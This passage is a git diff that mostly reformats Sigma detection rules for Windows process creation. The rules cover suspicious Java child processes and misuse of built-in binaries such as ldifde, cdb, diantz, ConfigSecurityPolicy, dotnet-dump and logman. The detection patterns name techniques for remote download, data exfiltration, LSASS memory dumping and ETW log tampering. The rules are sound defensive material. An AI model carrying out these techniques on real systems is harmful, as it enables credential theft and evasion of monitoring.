exploitation) references: - https://redcanary.com/blog/intelligence-insights-december-2021 - https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml index 0fe3a3bbf..708972f91 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Child Process Of Manage Engine ServiceDesk id: cea2b7ea-792b-405f-95a1-b903ea06458f status: experimental -description: Detects suspicious child processes of the "Manage Engine ServiceDesk - Plus" Java web service +description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service references: - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ - https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py @@ -38,7 +37,7 @@ detection: - \mshta.exe - \net.exe - \net1.exe - - \notepad.exe + - \notepad.exe # Often used in POCs - \powershell.exe - \pwsh.exe - \query.exe @@ -47,14 +46,18 @@ detection: - \scrcons.exe - \sh.exe - \systeminfo.exe - - \whoami.exe + - \whoami.exe # Often used in POCs - \wmic.exe - \wscript.exe + # - '\hh.exe' + # - '\regsvr32.exe' + # - '\rundll32.exe' + # - '\scriptrunner.exe' filter_main_net: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains: ' stop' + CommandLine|contains: ' stop' condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Legitimate sub processes started by Manage Engine ServiceDesk Pro diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_remote_debugging.yml b/sigma/sysmon/process_creation/proc_creation_win_java_remote_debugging.yml index 55e7ef65a..76b1987b2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_remote_debugging.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_remote_debugging.yml @@ -1,8 +1,7 @@ title: Java Running with Remote Debugging id: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710 status: test -description: Detects a JAVA process running with remote debugging allowing more than - just localhost to connect +description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect references: - https://dzone.com/articles/remote-debugging-java-applications-with-jdwp author: Florian Roth (Nextron Systems) @@ -20,13 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_jdwp_transport: - CommandLine|contains: transport=dt_socket,address= + CommandLine|contains: transport=dt_socket,address= selection_old_jvm_version: - CommandLine|contains: + CommandLine|contains: - jre1. - jdk1. exclusion: - CommandLine|contains: + CommandLine|contains: - address=127.0.0.1 - address=localhost condition: process_creation and (all of selection_* and not exclusion) diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process.yml index 6d7c1b01a..c4a1f4361 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Processes Spawned by Java.EXE id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d related: - - id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 - type: similar + - id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 + type: similar status: experimental -description: Detects suspicious processes spawned from a Java host process which could - indicate a sign of exploitation (e.g. log4j) +description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) author: Andreas Hunkeler (@Karneades), Florian Roth date: 2021/12/17 modified: 2023/11/09 @@ -46,7 +45,7 @@ detection: - \sh.exe - \systeminfo.exe - \whoami.exe - - \wmic.exe + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \wscript.exe condition: process_creation and selection falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process_2.yml b/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process_2.yml index 83c823446..cf5832916 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process_2.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process_2.yml @@ -1,11 +1,10 @@ title: Shell Process Spawned by Java.EXE id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 related: - - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d - type: similar + - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d + type: similar status: test -description: Detects shell spawned from Java host process, which could be a sign of - exploitation (e.g. log4j exploitation) +description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali date: 2021/12/17 modified: 2023/11/09 @@ -28,8 +27,8 @@ detection: - \powershell.exe - \pwsh.exe filter_main_build: - ParentImage|contains: build - CommandLine|contains: build + ParentImage|contains: build # excluding CI build agents + CommandLine|contains: build # excluding CI build agents condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Legitimate calls to system binaries diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml index 41efd9d7d..b89fd59c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious SysAidServer Child id: 60bfeac3-0d35-4302-8efb-1dd16f715bc6 status: test -description: Detects suspicious child processes of SysAidServer (as seen in MERCURY - threat actor intrusions) +description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) references: - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_kd_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_kd_execution.yml index c4a73aab3..a92a9c9f9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_kd_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_kd_execution.yml @@ -18,11 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \kd.exe - - OriginalFileName: kd.exe + - Image|endswith: \kd.exe + - OriginalFileName: kd.exe condition: process_creation and selection falsepositives: - - Rare occasions of legitimate cases where kernel debugging is necessary in production. - Investigation is required + - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_computer.yml b/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_computer.yml index 3f9550424..67e7412ec 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_computer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_computer.yml @@ -1,8 +1,7 @@ title: Computer Password Change Via Ksetup.EXE id: de16d92c-c446-4d53-8938-10aeef41c8b6 status: experimental -description: Detects password change for the computer's domain account or host principal - via "ksetup.exe" +description: Detects password change for the computer's domain account or host principal via "ksetup.exe" references: - https://twitter.com/Oddvarmoe/status/1641712700605513729 - https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ksetup.exe - - OriginalFileName: ksetup.exe + - Image|endswith: \ksetup.exe + - OriginalFileName: ksetup.exe selection_cli: - CommandLine|contains: ' /setcomputerpassword ' + CommandLine|contains: ' /setcomputerpassword ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_user.yml b/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_user.yml index adb32fd0e..95e142949 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_user.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_user.yml @@ -17,10 +17,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ksetup.exe - - OriginalFileName: ksetup.exe + - Image|endswith: \ksetup.exe + - OriginalFileName: ksetup.exe selection_cli: - CommandLine|contains: ' /ChangePassword ' + CommandLine|contains: ' /ChangePassword ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_ldifde_export.yml b/sigma/sysmon/process_creation/proc_creation_win_ldifde_export.yml index 60e4a41e9..00806869f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ldifde_export.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ldifde_export.yml @@ -1,8 +1,7 @@ title: Active Directory Structure Export Via Ldifde.EXE id: 4f7a6757-ff79-46db-9687-66501a02d9ec status: experimental -description: Detects the execution of "ldifde.exe" in order to export organizational - Active Directory structure. +description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. references: - https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html @@ -20,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_ldif: - - Image|endswith: \ldifde.exe - - OriginalFileName: ldifde.exe + - Image|endswith: \ldifde.exe + - OriginalFileName: ldifde.exe selection_cmd: - CommandLine|contains: -f + CommandLine|contains: -f filter_import: - CommandLine|contains: ' -i' + CommandLine|contains: ' -i' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_ldifde_file_load.yml b/sigma/sysmon/process_creation/proc_creation_win_ldifde_file_load.yml index da8328381..60402cf08 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ldifde_file_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ldifde_file_load.yml @@ -1,11 +1,8 @@ title: Import LDAP Data Interchange Format File Via Ldifde.EXE id: 6f535e01-ca1f-40be-ab8d-45b19c0c8b7f status: experimental -description: 'Detects the execution of "Ldifde.exe" with the import flag "-i". The - can be abused to include HTTP-based arguments which will allow the arbitrary download - of files from a remote server. - - ' +description: | + Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. references: - https://twitter.com/0gtweet/status/1564968845726580736 - https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html @@ -27,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ldifde.exe - - OriginalFileName: ldifde.exe + - Image|endswith: \ldifde.exe + - OriginalFileName: ldifde.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - -i - -f condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml b/sigma/sysmon/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml index cab9d0ce2..19a91819e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml @@ -1,10 +1,7 @@ title: Rebuild Performance Counter Values Via Lodctr.EXE id: cc9d3712-6310-4320-b2df-7cb408274d53 status: experimental -description: Detects the execution of "lodctr.exe" to rebuild the performance counter - registry values. This can be abused by attackers by providing a malicious config - file to overwrite performance counter configuration to confuse and evade monitoring - and security solutions. +description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. references: - https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr author: Nasreddine Bencherchali (Nextron Systems) @@ -23,7 +20,7 @@ detection: Image|endswith: \lodctr.exe OriginalFileName: LODCTR.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /r' - ' -r' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_logman_disable_eventlog.yml b/sigma/sysmon/process_creation/proc_creation_win_logman_disable_eventlog.yml index 0bc3cd3c1..7d72a478c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_logman_disable_eventlog.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_logman_disable_eventlog.yml @@ -1,8 +1,7 @@ title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE id: cd1f961e-0b96-436b-b7c6-38da4583ec00 status: test -description: Detects the execution of "logman" utility in order to disable or delete - Windows trace sessions +description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions references: - https://twitter.com/0gtweet/status/1359039665232306183?s=21 - https://ss64.com/nt/logman.html @@ -22,16 +21,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \logman.exe - - OriginalFileName: Logman.exe + - Image|endswith: \logman.exe + - OriginalFileName: Logman.exe selection_action: - CommandLine|contains: + CommandLine|contains: - 'stop ' - 'delete ' selection_service: - CommandLine|contains: + CommandLine|contains: - Circular Kernel Context Logger - - EventLog- + - EventLog- # Cover multiple traces starting with EventLog-* - SYSMON TRACE - SysmonDnsEtwSession condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_cdb.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_cdb.yml index 259473d83..fcfabc8fd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_cdb.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_cdb.yml @@ -1,8 +1,7 @@ title: WinDbg/CDB LOLBIN Usage id: b5c7395f-e501-4a08-94d4-57fe7a9da9d2 status: test -description: Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes - or commands from a debugger script file +description: Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/ - https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html @@ -25,11 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cdb.exe - - OriginalFileName: CDB.Exe + - Image|endswith: \cdb.exe + - OriginalFileName: CDB.Exe selection_cli: - CommandLine|contains: - - ' -c ' + CommandLine|contains: + - ' -c ' # Using a debugger script - ' -cf ' condition: process_creation and (all of selection*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml index ee3e67dfb..cc31d924b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml @@ -1,11 +1,10 @@ title: Custom Class Execution via Xwizard id: 53d4bb30-3f36-4e8a-b078-69d36c4a79ff status: test -description: Detects the execution of Xwizard tool with specific arguments which utilized - to run custom class properties. +description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. references: - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/07 modified: 2021/11/27 tags: @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \xwizard.exe - CommandLine|re: \{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\} + CommandLine|re: \{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\} condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_cmdl32.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_cmdl32.yml index 26bafce30..52c89d1d9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_cmdl32.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_cmdl32.yml @@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmdl32.exe - - OriginalFileName: CMDL32.EXE + - Image|endswith: \cmdl32.exe + - OriginalFileName: CMDL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/vpn ' - '/lan ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml index 27cefb6da..6b29db763 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml @@ -1,8 +1,7 @@ title: Suspicious ConfigSecurityPolicy Execution id: 1f0f6176-6482-4027-b151-00071af39d7e status: test -description: Upload file, credentials or data exfiltration with Binary part of Windows - Defender +description: Upload file, credentials or data exfiltration with Binary part of Windows Defender references: - https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/ author: frack113 @@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational lolbas: - - CommandLine|contains: ConfigSecurityPolicy.exe - - Image|endswith: \ConfigSecurityPolicy.exe - - OriginalFileName: ConfigSecurityPolicy.exe + - CommandLine|contains: ConfigSecurityPolicy.exe + - Image|endswith: \ConfigSecurityPolicy.exe + - OriginalFileName: ConfigSecurityPolicy.exe remote: - CommandLine|contains: + CommandLine|contains: - https:// - http:// - ftp:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_customshellhost.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_customshellhost.yml index 379ee5482..e4d9e4fdb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_customshellhost.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_customshellhost.yml @@ -1,8 +1,7 @@ title: Suspicious CustomShellHost Execution id: 84b14121-9d14-416e-800b-f3b829c5a14d status: test -description: Detects the execution of CustomShellHost binary where the child isn't - located in 'C:\Windows\explorer.exe' +description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe' references: - https://github.com/LOLBAS-Project/LOLBAS/pull/180 - https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml index 07745fc76..d4fee6070 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml @@ -23,13 +23,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cli: - CommandLine|contains: + CommandLine|contains: - '/in:' - '/out:' - '/uri:' selection_img: - - Image|endswith: \DataSvcUtil.exe - - OriginalFileName: DataSvcUtil.exe + - Image|endswith: \DataSvcUtil.exe + - OriginalFileName: DataSvcUtil.exe condition: process_creation and (all of selection*) fields: - ComputerName @@ -38,10 +38,7 @@ fields: - ParentCommandLine falsepositives: - DataSvcUtil.exe being used may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making - changes in your environment. - - DataSvcUtil.exe being executed from unfamiliar users should be investigated. - If known behavior is causing false positives, it can be exempted from the - rule. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml index 18e485aec..2a9e85079 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml @@ -23,7 +23,7 @@ detection: selection: Image|endswith: \dctask64.exe filter: - CommandLine|contains: DesktopCentral_Agent\agent + CommandLine|contains: DesktopCentral_Agent\agent condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_defaultpack.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_defaultpack.yml index be22e75bd..2bc03dd2c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_defaultpack.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_defaultpack.yml @@ -1,8 +1,7 @@ title: Lolbin Defaultpack.exe Use As Proxy id: b2309017-4235-44fe-b5af-b15363011957 status: test -description: Detect usage of the "defaultpack.exe" binary as a proxy to launch other - programs +description: Detect usage of the "defaultpack.exe" binary as a proxy to launch other programs references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/ - https://www.echotrail.io/insights/search/defaultpack.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml index ec909b9ee..b1c7bacd7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml @@ -1,8 +1,7 @@ title: DeviceCredentialDeployment Execution id: b8b1b304-a60f-4999-9a6e-c547bde03ffd status: test -description: Detects the execution of DeviceCredentialDeployment to hide a process - from view +description: Detects the execution of DeviceCredentialDeployment to hide a process from view references: - https://github.com/LOLBAS-Project/LOLBAS/pull/147 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml index 1988cf2fc..02981fc7b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml @@ -21,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \devtoolslauncher.exe - CommandLine|contains: LaunchForDeploy + CommandLine|contains: LaunchForDeploy condition: process_creation and selection falsepositives: - Legitimate use of devtoolslauncher.exe by legitimate user diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_ads.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_ads.yml index bd97423b2..48c056dd4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_ads.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_ads.yml @@ -1,8 +1,7 @@ title: Suspicious Diantz Alternate Data Stream Execution id: 6b369ced-4b1d-48f1-b427-fdc0de0790bd status: test -description: Compress target file into a cab file stored in the Alternate Data Stream - (ADS) of the target file. +description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file. references: - https://lolbas-project.github.io/lolbas/Binaries/Diantz/ author: frack113 @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - diantz.exe - .cab - CommandLine|re: :[^\\] + CommandLine|re: :[^\\] condition: process_creation and selection falsepositives: - Very Possible diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml index d52949af1..59c088b73 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml @@ -1,8 +1,7 @@ title: Suspicious Diantz Download and Compress Into a CAB File id: 185d7418-f250-42d0-b72e-0c8b70661e93 status: test -description: Download and compress a remote file and store it in a cab file on local - machine. +description: Download and compress a remote file and store it in a cab file on local machine. references: - https://lolbas-project.github.io/lolbas/Binaries/Diantz/ author: frack113 @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - diantz.exe - ' \\\\' - .cab diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml index 79144b4f2..8cd585926 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml @@ -1,8 +1,7 @@ title: Xwizard DLL Sideloading id: 193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1 status: test -description: Detects the execution of Xwizard tool from the non-default directory - which can be used to sideload a custom xwizards.dll +description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll references: - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet.yml index e2e78a385..d94acf5cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet.yml @@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dotnet.exe - - OriginalFileName: .NET Host + - Image|endswith: \dotnet.exe + - OriginalFileName: .NET Host selection_cli: - CommandLine|endswith: + CommandLine|endswith: - .dll - .csproj condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet_dump.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet_dump.yml index 1b0098450..e9b27f96c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet_dump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet_dump.yml @@ -1,8 +1,7 @@ title: Process Memory Dump Via Dotnet-Dump id: 53d8d3e1-ca33-4012-adf3-e05a4d652e34 status: experimental -description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution - could indicate potential process dumping of critical processes such as LSASS +description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS references: - https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect - https://twitter.com/bohops/status/1635288066909966338 @@ -20,14 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dotnet-dump.exe - - OriginalFileName: dotnet-dump.dll + - Image|endswith: \dotnet-dump.exe + - OriginalFileName: dotnet-dump.dll selection_cli: - CommandLine|contains: collect + CommandLine|contains: collect condition: process_creation and (all of selection_*) falsepositives: - - Process dumping is the expected behavior of the tool. So false positives are - expected in legitimate usage. The PID/Process Name of the process being dumped - needs to be investigated + - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dump64.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dump64.yml index b91bae1ea..fe97f2787 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dump64.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dump64.yml @@ -1,8 +1,7 @@ title: Suspicious Dump64.exe Execution id: 129966c9-de17-4334-a123-8b58172e664d status: test -description: Detects when a user bypasses Defender by renaming a tool to dump64.exe - and placing it in a Visual Studio folder +description: Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder references: - https://twitter.com/mrd0x/status/1460597833917251595 author: Austin Songer @austinsonger, Florian Roth @@ -22,13 +21,12 @@ detection: selection: Image|endswith: \dump64.exe procdump_flags: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - accepteula filter: Image|contains: \Installer\Feedback\dump64.exe - condition: process_creation and (( selection and not filter ) or ( selection and - procdump_flags )) + condition: process_creation and (( selection and not filter ) or ( selection and procdump_flags )) falsepositives: - Dump64.exe in other folders than the excluded one level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extexport.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extexport.yml index ffc291f64..a820834ac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extexport.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extexport.yml @@ -1,8 +1,7 @@ title: Suspicious Extexport Execution id: fb0b815b-f5f6-4f50-970f-ffe21f253f7a status: test -description: Extexport.exe loads dll and is execute from other folder the original - path +description: Extexport.exe loads dll and is execute from other folder the original path references: - https://lolbas-project.github.io/lolbas/Binaries/Extexport/ author: frack113 @@ -20,9 +19,9 @@ detection: EventID: 1 Channel: 